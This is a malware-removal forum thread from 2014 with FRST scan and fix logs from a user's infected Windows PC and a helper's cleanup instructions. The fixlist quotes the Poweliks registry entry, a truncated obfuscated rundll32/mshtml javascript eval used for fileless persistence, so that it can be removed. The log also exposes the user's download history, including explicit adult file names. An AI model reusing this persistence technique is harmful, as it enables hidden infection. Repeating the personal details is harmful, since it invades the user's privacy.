2014-10-16 22:42 - 2014-09-25 18:50 - 13619200 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-10-16 22:42 - 2014-09-25 18:46 - 00365056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2014-10-16 22:42 - 2014-09-25 18:46 - 00243200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2014-10-16 22:42 - 2014-09-25 18:46 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2014-10-16 22:42 - 2014-09-25 18:43 - 11807232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2014-10-16 22:42 - 2014-09-25 18:32 - 02017280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2014-10-16 22:42 - 2014-09-25 18:31 - 02108416 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-10-16 22:42 - 2014-09-18 22:25 - 23631360 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-10-16 22:42 - 2014-09-18 21:56 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-10-16 22:42 - 2014-09-18 21:55 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-10-16 22:42 - 2014-09-18 21:44 - 17484800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2014-10-16 22:42 - 2014-09-18 21:41 - 02796032 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-10-16 22:42 - 2014-09-18 21:40 - 00547328 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-10-16 22:42 - 2014-09-18 21:40 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-10-16 22:42 - 2014-09-18 21:39 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-10-16 22:42 - 2014-09-18 21:38 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-10-16 22:42 - 2014-09-18 21:36 - 05829632 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-10-16 22:42 - 2014-09-18 21:31 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-10-16 22:42 - 2014-09-18 21:30 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-10-16 22:42 - 2014-09-18 21:27 - 00595968 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-10-16 22:42 - 2014-09-18 21:26 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-10-16 22:42 - 2014-09-18 21:25 - 04201472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2014-10-16 22:42 - 2014-09-18 21:25 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-10-16 22:42 - 2014-09-18 21:25 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-10-16 22:42 - 2014-09-18 21:18 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-10-16 22:42 - 2014-09-18 21:14 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2014-10-16 22:42 - 2014-09-18 21:14 - 00446464 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-10-16 22:42 - 2014-09-18 21:06 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-10-16 22:42 - 2014-09-18 21:02 - 00454656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2014-10-16 22:42 - 2014-09-18 21:01 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-10-16 22:42 - 2014-09-18 21:01 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2014-10-16 22:42 - 2014-09-18 21:01 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2014-10-16 22:42 - 2014-09-18 21:00 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-10-16 22:42 - 2014-09-18 20:59 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2014-10-16 22:42 - 2014-09-18 20:58 - 00289280 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-10-16 22:42 - 2014-09-18 20:55 - 02187264 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2014-10-16 22:42 - 2014-09-18 20:54 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2014-10-16 22:42 - 2014-09-18 20:53 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2014-10-16 22:42 - 2014-09-18 20:51 - 00440320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2014-10-16 22:42 - 2014-09-18 20:50 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2014-10-16 22:42 - 2014-09-18 20:49 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2014-10-16 22:42 - 2014-09-18 20:42 - 00731136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-10-16 22:42 - 2014-09-18 20:42 - 00710656 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-10-16 22:42 - 2014-09-18 20:40 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-10-16 22:42 - 2014-09-18 20:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2014-10-16 22:42 - 2014-09-18 20:33 - 02309632 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-10-16 22:42 - 2014-09-18 20:32 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2014-10-16 22:42 - 2014-09-18 20:20 - 00607744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2014-10-16 22:42 - 2014-09-18 20:18 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2014-10-16 22:42 - 2014-09-18 20:14 - 01447936 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-10-16 22:42 - 2014-09-18 19:59 - 01810944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2014-10-16 22:42 - 2014-09-18 19:59 - 00775168 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-10-16 22:42 - 2014-09-18 19:53 - 01190400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2014-10-16 22:42 - 2014-09-18 19:52 - 00678400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2014-10-16 22:42 - 2014-09-17 22:00 - 03241472 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-10-16 22:42 - 2014-09-17 21:32 - 02363904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-10-16 22:42 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL
2014-10-16 22:42 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL
2014-10-16 22:42 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL
2014-10-16 22:42 - 2014-07-08 22:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL
2014-10-16 22:42 - 2014-07-08 22:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL
2014-10-16 22:42 - 2014-07-08 21:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL
2014-10-16 22:42 - 2014-07-08 21:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL
2014-10-16 22:42 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL
2014-10-16 22:42 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL
2014-10-16 22:42 - 2014-07-08 21:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL
2014-10-16 22:42 - 2014-07-08 18:38 - 00419992 _____ () C:\Windows\system32\locale.nls
2014-10-16 22:42 - 2014-07-08 18:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls
2014-10-16 22:42 - 2014-06-18 18:23 - 01943696 _____ (Microsoft Corporation) C:\Windows\system32\dfshim.dll
2014-10-16 22:42 - 2014-06-18 18:23 - 01131664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dfshim.dll
2014-10-16 22:42 - 2014-06-18 18:23 - 00156824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscorier.dll
2014-10-16 22:42 - 2014-06-18 18:23 - 00156312 _____ (Microsoft Corporation) C:\Windows\system32\mscorier.dll
2014-10-16 22:42 - 2014-06-18 18:23 - 00081560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mscories.dll
2014-10-16 22:42 - 2014-06-18 18:23 - 00073880 _____ (Microsoft Corporation) C:\Windows\system32\mscories.dll
2014-10-16 22:41 - 2014-09-12 21:58 - 00077312 _____ (Microsoft Corporation) C:\Windows\system32\packager.dll
2014-10-16 22:41 - 2014-09-12 21:40 - 00067072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\packager.dll
2014-10-16 22:41 - 2014-09-04 01:23 - 00424448 _____ (Microsoft Corporation) C:\Windows\system32\rastls.dll
2014-10-16 22:41 - 2014-09-04 01:04 - 00372736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rastls.dll
2014-10-16 22:41 - 2014-07-16 22:07 - 03722240 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-10-16 22:41 - 2014-07-16 22:07 - 01118720 _____ (Microsoft Corporation) C:\Windows\system32\mstsc.exe
2014-10-16 22:41 - 2014-07-16 22:07 - 00681984 _____ (Microsoft Corporation) C:\Windows\system32\termsrv.dll
2014-10-16 22:41 - 2014-07-16 22:07 - 00455168 _____ (Microsoft Corporation) C:\Windows\system32\winlogon.exe
2014-10-16 22:41 - 2014-07-16 22:07 - 00235520 _____ (Microsoft Corporation) C:\Windows\system32\winsta.dll
2014-10-16 22:41 - 2014-07-16 22:07 - 00150528 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorekmts.dll
2014-10-16 22:41 - 2014-07-16 22:07 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2014-10-16 22:41 - 2014-07-16 22:07 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2014-10-16 22:41 - 2014-07-16 21:40 - 00157696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\winsta.dll
2014-10-16 22:41 - 2014-07-16 21:39 - 03221504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-10-16 22:41 - 2014-07-16 21:39 - 01051136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstsc.exe
2014-10-16 22:41 - 2014-07-16 21:39 - 00131584 _____ (Microsoft Corporation) C:\Windows\SysWOW64\aaclient.dll
2014-10-16 22:41 - 2014-07-16 21:39 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2014-10-16 22:41 - 2014-07-16 21:39 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2014-10-16 22:41 - 2014-07-16 21:21 - 00212480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rdpwd.sys
2014-10-16 22:41 - 2014-07-16 21:21 - 00039936 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\tssecsrv.sys
2014-10-06 21:08 - 2014-10-06 21:08 - 00000000 ____D () C:\Windows\System32\Tasks\Norton Security Suite
2014-10-05 20:59 - 2014-09-24 22:08 - 00371712 _____ (Microsoft Corporation) C:\Windows\system32\qdvd.dll
2014-10-05 20:59 - 2014-09-24 21:40 - 00519680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qdvd.dll
2014-09-28 19:35 - 2014-09-28 19:37 - 00000000 ____D () C:\Users\Dan\Desktop\Todd's Gig
2014-09-28 18:25 - 2014-09-09 18:11 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2014-09-28 18:25 - 2014-09-09 17:47 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2014-09-21 22:10 - 2014-09-21 22:25 - 311791886 _____ () C:\Users\Dan\Downloads\Clips4Sale Hanna, Nomi Two Teasing Tongues 9.avi
2014-09-21 19:26 - 2014-09-21 19:28 - 00000000 ____D () C:\Users\Dan\Downloads\Girls Season 3
2014-09-21 19:21 - 2014-09-21 21:50 - 355330078 _____ () C:\Users\Dan\Downloads\Clips4Sale - K Daniela - Super Teaser - Part B 1080p.mp4
2014-09-20 22:28 - 2014-09-21 18:02 - 619539470 _____ () C:\Users\Dan\Downloads\SexuallyBroken - August 29, 2014 - Veronica Avluv - Matt Williams.720p.high.mp4
2014-09-20 22:07 - 2014-09-20 22:07 - 00000000 ____D () C:\Users\Dan\Downloads\SexuallyBroken - Lean Latina Lyla Storm (completely destroyed by cock Epic brutal deepthroat massive orgasms on BBC)
2014-09-20 22:03 - 2014-09-20 22:04 - 00000000 ____D () C:\Users\Dan\Downloads\SexuallyBroken - Stunning Veruca James (Utterly destroyed by cock brutal pounding epic deepthroat multiple orgasm)
2014-09-20 22:02 - 2014-09-20 22:03 - 00000000 ____D () C:\Users\Dan\Downloads\SexuallyBrokenBound - Rain DeGrey(Busty blonde does epic deepthroat on 2 hard cocks fucked rough and hard)
2014-09-20 21:59 - 2014-09-20 22:01 - 00000000 ____D () C:\Users\Dan\Downloads\SexuallyBroken - Giant titted MILF Ava Devine blindfolded bound and fucked roughly by 2 cocks filled and creampied
2014-09-20 21:56 - 2014-09-20 21:59 - 00000000 ____D () C:\Users\Dan\Downloads\SexuallyBroken - Veronica Avluv (Gets blindfolded handcuffed and used hard from both ends by hard cock)
2014-09-20 21:42 - 2014-09-20 21:42 - 00000000 ____D () C:\Users\Dan\Downloads\a-hj269

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-10-18 15:13 - 2009-07-14 01:13 - 00789658 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-10-18 15:10 - 2010-10-28 00:28 - 01769826 _____ () C:\Windows\WindowsUpdate.log
2014-10-18 14:46 - 2013-10-18 23:13 - 00000892 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-18 10:34 - 2009-07-14 00:45 - 00023248 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-18 10:34 - 2009-07-14 00:45 - 00023248 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-10-18 10:08 - 2013-10-01 14:39 - 00000000 ___RD () C:\Users\Dan\Dropbox
2014-10-18 10:08 - 2013-10-01 14:37 - 00000000 ____D () C:\Users\Dan\AppData\Roaming\Dropbox
2014-10-18 10:05 - 2013-11-29 20:37 - 00014172 _____ () C:\Windows\setupact.log
2014-10-18 10:05 - 2013-10-18 23:13 - 00000888 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-18 10:05 - 2009-07-14 01:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-18 00:33 - 2014-09-06 14:46 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-18 00:24 - 2011-01-09 23:52 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-18 00:07 - 2013-11-29 20:36 - 00155326 _____ () C:\Windows\PFRO.log
2014-10-17 21:48 - 2009-07-14 00:45 - 00359000 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-10-17 01:04 - 2013-09-25 22:19 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-10-17 00:38 - 2013-08-24 15:08 - 00000000 ____D () C:\Windows\system32\MRT
2014-10-17 00:10 - 2010-12-25 13:41 - 103265616 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-10-12 15:27 - 2011-01-09 19:25 - 00000000 ____D () C:\Users\Dan\AppData\Roaming\vlc
2014-10-06 21:02 - 2010-12-26 14:03 - 00000000 ____D () C:\Windows\system32\Drivers\N360x64
2014-10-06 21:01 - 2013-11-29 20:00 - 00000000 ___RD () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Norton Security Suite
2014-10-06 21:01 - 2013-02-12 22:16 - 00003228 _____ () C:\Windows\System32\Tasks\Norton WSC Integration
2014-09-21 22:34 - 2012-06-06 19:16 - 00000000 ____D () C:\Users\Dan\AppData\Roaming\uTorrent
2014-09-21 22:19 - 2014-03-31 23:36 - 00000000 ____D () C:\Users\Dan\Desktop\New folder (2)
2014-09-20 22:17 - 2013-06-16 16:29 - 00000000 ____D () C:\Users\Dan\dwhelper
2014-09-20 14:28 - 2010-12-25 10:28 - 00003174 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForDan
2014-09-20 14:28 - 2010-12-25 10:28 - 00000324 _____ () C:\Windows\Tasks\HPCeeScheduleForDan.job
2014-09-20 14:23 - 2013-10-01 14:37 - 00000000 ____D () C:\Users\Dan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox

Some content of TEMP:
====================
C:\Users\Dan\AppData\Local\Temp\dropbox_sqlite_ext.{5f3e3153-5bce-5766-8f84-3e3e7ecf0d81}.tmp2vgf0p.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-05-11 23:04

==================== End Of Log ============================

Last Edit: Oct 18, 2014 11:20:00 GMT -8 by danimal1969

dbrisen Malware Removalists Posts: 3,688	Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 11:15:27 GMT -8 Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by dbrisen on Oct 18, 2014 11:15:27 GMT -8 Are you using IE?
	I will not provide malware removal by PM; please post in your thread on the Malware Removal board. My help is always free but if you would like to help encourage me or show your thanks -----> *DONATE*

danimal1969 New Helpee Posts: 22	Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 11:23:26 GMT -8 Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by danimal1969 on Oct 18, 2014 11:23:26 GMT -8 wikisend.com/download/254914/Addition.txt Addition.txt

danimal1969 New Helpee Posts: 22	Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 11:24:45 GMT -8 Select Post Deselect Post Link to Post Member Give Gift Back to Top Post by danimal1969 on Oct 18, 2014 11:24:45 GMT -8 Yes, I am using IE. I had to d/l on another machine. Ran and posted logs as requested.

dbrisen
Malware Removalists

Posts: 3,688

Powershell Errors, powelik and adclick, dllhost.exe #? Oct 18, 2014 22:45:45 GMT -8

Post by dbrisen on Oct 18, 2014 22:45:45 GMT -8

Thanks for the logs. Let's see if we can get rid of the extra dllhost.exe .

Please read all of this post first before doing any of it. If you have a question, come back and ask.

First, disable Norton (everything but the firewall as we need to download some files).

Notice: The attached files and procedure are for this thread's owner and no other system. Using them could damage other systems or cause them to be non-operational.

Please download GiveMePower from this link to your desktop. Double click on the file once it it downloaded and run the self-extractor; use the default location of your desktop. (We will clean up our tools later.)

Save (download / save as) the attached Fixlist.txt file to your desktop. Attachment Deleted

You should now have FRST64.exe, Fixlist.txt and 4 GiveMePower files on your desktop.

1) Double click on the GiveMePower.exe icon (green circle with a lightening bolt) to start the program.

2) Click on the Browse button in the middle of the screen. In the Open File Dialog box, navigate and find the FRST64.exe file located in the Desktop folder. Click on it and select Open.

3) FRST64 will load and run.

4) If there is an update to the program, FRST will inform you of this and download the program. Let it do this and then close the program. Return to step 2.

5) If there is no update available, the program load and quickly inform that there is no update.

6) Click on the Fix button to have FRST64 run the Fixlist scripts. Your desktop will close and your system restart to finish the removal process.

7) When finished, FRST will produce a Fixlog.txt log file. Please attach this file in your next reply.

I will not provide malware removal by PM; please post in your thread on the Malware Removal board.
My help is always free but if you would like to help encourage me or show your thanks -----> DONATE

danimal1969
New Helpee

Posts: 22

Powershell Errors, powelik and adclick, dllhost.exe #? Oct 19, 2014 6:52:43 GMT -8

Post by danimal1969 on Oct 19, 2014 6:52:43 GMT -8

Ok, here's what happened. I couldn't download anything on this computer, even with Norton disabled. I got a security warning that said I could not download. Exact phrase was "Your current security settings do not allow this file to be downloaded". No way around it. I downloaded the stuff from a different computer and put on my desktop.

Before I could run the scan/fix list, I was getting "high cpu usage from google chrome". Note that I don't use or even have chrome on this computer. Also started getting notifications that HP wireless assistant was inoperative.

Ran give me power/frst as instructed. Note that computer did not restart, but log file appeared on desktop. I restarted the computer manually and upon restart, computer still seems sluggish. I checked on the task manager and see numerous chrome processes running. Again, no chrome installed as far as I know. Certainly not being used. Still getting the high disc use by chrome and wireless assistant inop.

Also, I should note that I cannot download files/attachments from this site or any other. I get that same warning. And, Firefox is totally inoperative. I click to open it, and I get a warning that says "Firefox has stopped working" and the only option is to close.

So this thing has some issues still.

Here is the fixit log:

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 18-10-2014 01
Ran by SYSTEM at 2014-10-19 10:23:46 Run:1
Running from C:\Users\Dan\Desktop
Loaded Profile: Dan (Available profiles: Dan)
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
start
CloseProcesses:
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\MountPoints2: F - F:\LaunchU3.exe -a
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\MountPoints2: {beef630b-2661-11e4-8ab5-fae39741fd93} - G:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...\MountPoints2: {c0897274-3caf-11e1-851e-e9719a0a1c8d} - G:\LaunchU3.exe -a
HKU\S-1-5-21-1279983707-131282063-3389478783-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1279983707-131282063-3389478783-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
EmptyTemp:
end

*****************

Processes closed successfully.
"HKU\S-1-5-21-1279983707-131282063-3389478783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\S-1-5-21-1279983707-131282063-3389478783-1000" => Key not found.
"HKU\S-1-5-21-1279983707-131282063-3389478783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{beef630b-2661-11e4-8ab5-fae39741fd93}" => Key deleted successfully.
"HKCR\CLSID\{beef630b-2661-11e4-8ab5-fae39741fd93}" => Key not found.
"HKU\S-1-5-21-1279983707-131282063-3389478783-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c0897274-3caf-11e1-851e-e9719a0a1c8d}" => Key deleted successfully.
"HKCR\CLSID\{c0897274-3caf-11e1-851e-e9719a0a1c8d}" => Key not found.
"HKU\S-1-5-21-1279983707-131282063-3389478783-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.
"HKU\S-1-5-21-1279983707-131282063-3389478783-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-21-1279983707-131282063-3389478783-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

Last Edit: Oct 19, 2014 7:17:15 GMT -8 by danimal1969

Powershell Errors, powelik and adclick, dllhost.exe #?

Post by danimal1969 on Oct 18, 2014 6:29:49 GMT -8

Post by dbrisen on Oct 18, 2014 8:44:41 GMT -8

Post by danimal1969 on Oct 18, 2014 8:51:23 GMT -8

Post by dbrisen on Oct 18, 2014 10:06:32 GMT -8

Post by danimal1969 on Oct 18, 2014 10:45:24 GMT -8

Post by dbrisen on Oct 18, 2014 11:15:27 GMT -8

Post by danimal1969 on Oct 18, 2014 11:23:26 GMT -8

Post by danimal1969 on Oct 18, 2014 11:24:45 GMT -8

Post by dbrisen on Oct 18, 2014 22:45:45 GMT -8

Post by danimal1969 on Oct 19, 2014 6:52:43 GMT -8